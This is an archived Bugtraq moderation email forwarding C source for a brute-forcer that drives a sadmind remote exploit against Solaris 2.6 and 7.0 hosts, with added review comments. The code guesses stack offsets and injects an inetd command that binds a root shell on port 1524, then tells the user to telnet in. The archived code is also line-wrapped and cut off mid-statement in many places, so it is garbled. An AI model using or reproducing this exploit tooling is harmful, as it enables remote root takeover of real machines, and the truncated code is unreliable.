
  1. From aleph1@SECURITYFOCUS.COM Fri Nov 10 12:43:31 2000
  2. Date: Fri, 10 Nov 2000 09:50:50 -0800
  3. From: Elias Levy <aleph1@SECURITYFOCUS.COM>
  4. To: vuldb@securityfocus.com
  5. Subject: (forw) BUGTRAQ: approval required (2C2CCEC7)
  6.  
  7.  
  8. -- 
  9. Elias Levy
  10. SecurityFocus.com
  11. http://www.securityfocus.com/
  12. Si vis pacem, para bellum
  13.  
  14.     [ Part 2: "Included Message" ]
  15.  
  16. Date: Fri, 10 Nov 2000 04:35:43 -0800
  17. From: "L-Soft list server at SecurityFocus.com (1.8d)"
  18.     <LISTSERV@LISTS.SECURITYFOCUS.COM>
  19. To: Elias Levy <aleph1@SECURITYFOCUS.COM>
  20. Subject: BUGTRAQ: approval required (2C2CCEC7)
  21.  
  22. This message was originally submitted by root@SECURITYFOCUS.COM to the BUGTRAQ
  23. list at LISTS.SECURITYFOCUS.COM. You can  approve it using the "OK" mechanism,
  24. ignore it, or repost an edited copy. The message will expire automatically and
  25. you do not need to do anything if you just want to discard it. Please refer to
  26. the list owner's guide if you are  not familiar with the "OK" mechanism; these
  27. instructions  are  being  kept  purposefully short  for  your  convenience  in
  28. processing large numbers of messages.
  29.  
  30. ----------------- Original message (ID=2C2CCEC7) (274 lines) ------------------
  31. Return-Path: <owner-bugtraq@securityfocus.com>
  32. Delivered-To: bugtraq@lists.securityfocus.com
  33. Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78])
  34.     by lists.securityfocus.com (Postfix) with SMTP id 8431D24C489
  35.     for <bugtraq@lists.securityfocus.com>; Fri, 10 Nov 2000 04:35:43 -0800 (PST)
  36. Received: (qmail 22921 invoked by alias); 10 Nov 2000 12:38:11 -0000
  37. Delivered-To: bugtraq@securityfocus.com
  38. Received: (qmail 22918 invoked from network); 10 Nov 2000 12:38:11 -0000
  39. Received: from www3.securityfocus.com (HELO securityfocus.com) (207.126.127.74)
  40.   by mail.securityfocus.com with SMTP; 10 Nov 2000 12:38:11 -0000
  41. Received: (qmail 6375 invoked by uid 103); 10 Nov 2000 12:34:52 -0000
  42. Date: 10 Nov 2000 12:34:52 -0000
  43. Message-ID: <20001110123452.6374.qmail@securityfocus.com>
  44. From: nikolai abromov <minix@antionline.org>
  45. To: bugtraq@securityfocus.com
  46. X-Mailer: Security Focus
  47. Subject: Re: sadmind exploits (remote sparc/x86)
  48. Sender: root@securityfocus.com
  49.  
  50.  
  51. brute force offset .... 
  52.  
  53.  
  54.  
  55.  
  56. // *** Synnergy Networks
  57.  
  58. #include <stdio.h>
  59. #include <stdlib.h>
  60. #include <signal.h>
  61. #include <string.h>
  62. #include <sys/errno.h>
  63. #include <sys/types.h>
  64. #include <sys/socket.h>
  65. #include <sys/stat.h>
  66. #include <fcntl.h>
  67. #include <netinet/in.h>
  68. #include <netdb.h>
  69. #include <unistd.h>
  70.  
  /* Tunables and fixed constants for the wrapper in main() below.
   * NOTE(review): several macro bodies here (BINDINGRES and the EXPCMD*
   * format strings) are split across physical lines without backslash
   * continuations in this archived copy, so the file does not preprocess
   * as shown; this looks like archive line-wrapping rather than the
   * author's layout. */
  71. /* *** ATTENTION *** you may have to change some
  72. of these *** ATTENTION *** */
  73. #define EXPX86          "sadmindex-x86"  /*
  74. sadmind exploit for x86 arch */
  75. #define EXPSPARC        "sadmindex-sparc"  /*
  76. sadmind exploit for sparc arch */
  77. #define INC             4  /* sp brute forcing
  78. incrementation - 4 should be ok
  79.  
  80. /* DON'T change the following */
  /* NOTE(review): the INC comment two lines up is never closed on its own
   * line; the closing marker of the "DON'T change" banner is what
   * terminates it, so that banner is swallowed into the INC comment. */
  81. #define FALSE           0  /* false */
  82. #define TRUE            !FALSE  /* true */
  /* Shell command string handed to the exploit binary as its -c argument
   * (third %s of the EXPCMD* formats). */
  83. #define BINDINGRES      "echo 'ingreslock stream
  84. tcp nowait root /bin/sh sh -i'
  85.                                         > /tmp/.x;
  86. /usr/sbin/inetd -s /tmp/.x;
  87.                                         m -f
  88. /tmp/.x;"  /* bind rootshell */
  /* Per-target starting guesses; main() steps around each of these in
   * increments of INC. */
  89. #define SPX8626         0x080418ec  /* default
  90. sadmindex sp for x86 2.6 */
  91. #define SPX867          0x08041798  /* default
  92. sadmindex sp for x86 7.0 */
  93. #define SPSPARC26       0xefff9580  /* default
  94. sadmindex sp for sparc 2.6 */
  95. #define SPSPARC7        0xefff9418  /* default
  96. sadmindex sp for sparc 7.0 */
  /* system() command-line formats: %s exploit binary, %s host,
   * %s command string, %x current guess.  The two x86 variants differ
   * only in the fixed -j value (512 vs 536); the SPARC variant has none. */
  97. #define EXPCMDX8626     "./%s -h %s -c \"%s\" -s
  98. 0x%x -j 512\n"  /* cmd line */
  99. #define EXPCMDX867      "./%s -h %s -c \"%s\" -s
  100. 0x%x -j 536\n"  /* cmd line */
  101. #define EXPCMDSPARC     "./%s -h %s -c \"%s\" -s
  102. 0x%x\n"  /* cmd line */
  103.  
  /*
   * Entry point.  argv[1] selects one of four target tables (1-4, see the
   * usage text), argv[2] is the host.  Every pass of the per-arch loop first
   * attempts a TCP connect to <host>:1524; a successful connect is taken as
   * "done" (prints a notice and exits 0).  Otherwise the external exploit
   * binary named by EXPX86 / EXPSPARC is run through system() with the next
   * guess and the loop continues.  Reaching the end of a loop means all
   * 1025 guesses were tried; main then falls off its end (implicit return).
   *
   * NOTE(review) - defects visible in this copy, repeated in all four branches:
   *  - malloc(size) is never checked for NULL before snprintf() writes to it.
   *  - open() is used purely as an existence test for the exploit binary and
   *    the descriptor is never closed, so one fd leaks per iteration.
   *  - sockfd is closed only on the connect-success path; when connect()
   *    fails the socket is abandoned, so a second fd leaks per iteration.
   *  - the host argument is formatted into a shell command line unquoted
   *    (presumably argv[2]; the snprintf() calls are cut off here), so a
   *    host string containing shell metacharacters is interpreted by
   *    /bin/sh inside system().
   *  - many statements below are truncated mid-line (printf strings, the
   *    connect() condition, the snprintf() arguments); the file as archived
   *    does not compile.
   */
  104. int
  105. main(int argc, char **argv)
  106. {
  107.         int i, sockfd, fd, size = 4096, sign = -1;
  108.         long int addr;
          /* scratch buffer for the system() command line; allocation unchecked */
  109.         char *buffer = (char *) malloc (size);
  110.         struct hostent *he;
  111.         struct sockaddr_in their_addr;
          /* usage error; TRUE expands to !FALSE, i.e. exit status 1 */
  112.         if (argc < 3)
  113.         {
  114.                 fprintf(stderr, "\nsadmindex sp
  115. brute forcer - by elux\n");
  116.                 fprintf(stderr, "usage: %s [arch]
  117. <host>\n\n", argv[0]);
  118.                 fprintf(stderr, "\tarch:\n");
  119.                 fprintf(stderr, "\t1 - x86 Solaris
  120. 2.6\n");
  121.                 fprintf(stderr, "\t2 - x86 Solaris
  122. 7.0\n");
  123.                 fprintf(stderr, "\t3 - SPARC
  124. Solaris 2.6\n");
  125.                 fprintf(stderr, "\t4 - SPARC
  126. Solaris 7.0\n\n");
  127.                 exit(TRUE);
  128.         }
  129.  
          /* resolve once up front; gethostbyname() result is used for every probe */
  130.         if ( (he = gethostbyname(argv[2])) ==
  131. NULL)
  132.         {
  133.                 printf("Unable to resolve %s\n",
  134. argv[2]);
  135.                 exit(TRUE);
  136.         }
  137.  
  138.         their_addr.sin_family = AF_INET;
          /* probe port; 1524 is conventionally "ingreslock", the service name
           * used in BINDINGRES - presumably chosen to match, confirm */
  139.         their_addr.sin_port = htons(1524);
  140.         their_addr.sin_addr = *((struct in_addr
  141. *)he->h_addr);
  142.         bzero(&(their_addr.sin_zero), 8);
  143.  
          /* arch 1: x86 Solaris 2.6 - base SPX8626, command format EXPCMDX8626 */
     144.      if ( (strcmp(argv[1], "1")) == 0)
  145.         {
  146.                 addr = SPX8626;
  147.                 printf("\nAlright... sit back and
  148. relax while this program brut
                  /* 1025 passes (0..4096 step INC).  sign flips every pass,
                   * so the guess alternates around the base with growing
                   * distance: base, +4, -4, +8, -8, ... (addr -= i*sign). */
  149.                 for (i = 0; i <= 4096; i += INC)
  150.                 {
                          /* probe first; a failed socket() is silently ignored
                           * and the pass proceeds to run the exploit anyway */
  151.                         if ( (sockfd =
  152. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  153.                         {
                                  /* condition truncated in this copy; presumably
                                   * tests for a successful connect */
  154.                                 if (
  155. (connect(sockfd, (struct sockaddr *)&their
  156.                                 {
  157.                                        
  158. fprintf(stderr, "\n\nNow telnet to %s,
  159.                                        
  160. close(sockfd);
                                          /* FALSE == 0: success status */
  161.                                        
  162. exit(FALSE);
  163.                                 }
                                  /* connect failed: sockfd is not closed here */
  164.                         }
                          /* existence check only; fd is never closed */
  165.                         if ( (fd = open(EXPX86,
  166. O_RDONLY)) != -1)
  167.                         {
  168.                                 sign *= -1;
  169.                                 addr -= i *sign;
                                  /* remaining arguments cut off in this copy;
                                   * the format expects host, BINDINGRES, addr */
  170.                                 snprintf(buffer,
  171. size, EXPCMDX8626, EXPX86, arg
  172.                                 system(buffer);
  173.                         }
  174.                         else
  175.                    {
  176.                                 printf("\n\n%s
  177. doesn't exisit, you need the sad
  178.                                 exit(TRUE);
  179.                         }
  180.                 }
  181.         }
          /* arch 2: x86 Solaris 7.0 - identical to arch 1 except for the base
           * (SPX867) and the command format (EXPCMDX867, -j 536) */
  182.         else if ( (strcmp(argv[1], "2")) == 0)
  183.         {
  184.                 addr = SPX867;
  185.                 printf("\nAlright... sit back and
  186. relax while this program brut
  187.                 for (i = 0; i <= 4096; i += INC)
  188.                 {
  189.                         if ( (sockfd =
  190. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  191.                         {
  192.                                 if (
  193. (connect(sockfd, (struct sockaddr *)&their
  194.                                 {
  195.                                        
  196. fprintf(stderr, "\n\nNow telnet to %s,
  197.                                        
  198. close(sockfd);
  199.                                        
  200. exit(FALSE);
  201.                                 }
  202.                         }
  203.                         if ( (fd = open(EXPX86,
  204. O_RDONLY)) != -1)
  205.                         {
  206.  
  207.  
  208.                              sign *= -1;
  209.                                 addr -= i *sign;
  210.                                 snprintf(buffer,
  211. size, EXPCMDX867, EXPX86, argv
  212.                                 system(buffer);
  213.                         }
  214.                         else
  215.                         {
  216.                                 printf("\n\n%s
  217. doesn't exisit, you need the sad
  218.                                 exit(TRUE);
  219.                         }
  220.                 }
  221.         }
          /* arch 3: SPARC Solaris 2.6 - same loop, base SPSPARC26, binary
           * EXPSPARC, command format EXPCMDSPARC (no -j) */
  222.         else if ( (strcmp(argv[1], "3")) == 0)
  223.         {
  224.                 addr = SPSPARC26;
  225.                 printf("\nAlright... sit back and
  226. relax while this program brut
  227.                 for (i = 0; i <= 4096; i += INC)
  228.                 {
  229.                         if ( (sockfd =
  230. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  231.                         {
  232.                                 if (
  233. (connect(sockfd, (struct sockaddr *)&their
  234.                                 {
  235.                                        
  236. fprintf(stderr, "\n\nNow telnet to %s,
  237.                           close(sockfd);
  238.                                        
  239. exit(FALSE);
  240.                                 }
  241.                         }
  242.                         if ( (fd = open(EXPSPARC,
  243. O_RDONLY)) != -1)
  244.                         {
  245.                                 sign *= -1;
  246.                                 addr -= i *sign;
  247.                                 snprintf(buffer,
  248. size, EXPCMDSPARC, EXPSPARC, a
  249.                                 system(buffer);
  250.                         }
  251.                         else
  252.                         {
  253.                                 printf("\n\n%s
  254. doesn't exisit, you need the sad
  255.                                 exit(TRUE);
  256.                         }
  257.                 }
  258.         }
          /* arch 4: SPARC Solaris 7.0 - as arch 3 with base SPSPARC7 */
  259.         else if ( (strcmp(argv[1], "4")) == 0)
  260.         {
  261.                 addr = SPSPARC7;   
  262.                 printf("\nAlright... sit back and
  263. relax while this program brut
  264.                 for (i = 0; i <= 4096; i += INC)
  265.      {
  266.                         if ( (sockfd =
  267. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  268.                         {
  269.                                 if (
  270. (connect(sockfd, (struct sockaddr *)&their
  271.                                 {  
  272.                                        
  273. fprintf(stderr, "\n\nNow telnet to %s,
  274.                                        
  275. close(sockfd);
  276.                                        
  277. exit(FALSE);
  278.                                 }  
  279.                         }
  280.                         if ( (fd = open(EXPSPARC,
  281. O_RDONLY)) != -1)
  282.                         {
  283.                                 sign *= -1;
  284.                                 addr -= i *sign;
  285.                                 snprintf(buffer,
  286. size, EXPCMDSPARC, EXPSPARC, a
  287.                                 system(buffer);
  288.                         }
  289.                         else
  290.                         {
  291.                                 printf("\n\n%s
  292. doesn't exisit, you need the sad
  293.                                 exit(TRUE);
  294.                         }
  295.                 }
  296.  
  297.         }
          /* unknown selector: message only; main still ends with implicit
           * return (argument list cut off in this copy, presumably argv[1]) */
  298.         else
  299.                 printf("%s is not a supported
  300. arch, try 1 - 4 ... .. .\n", argv
  301. }
  302.  
  303. // EOF
  304.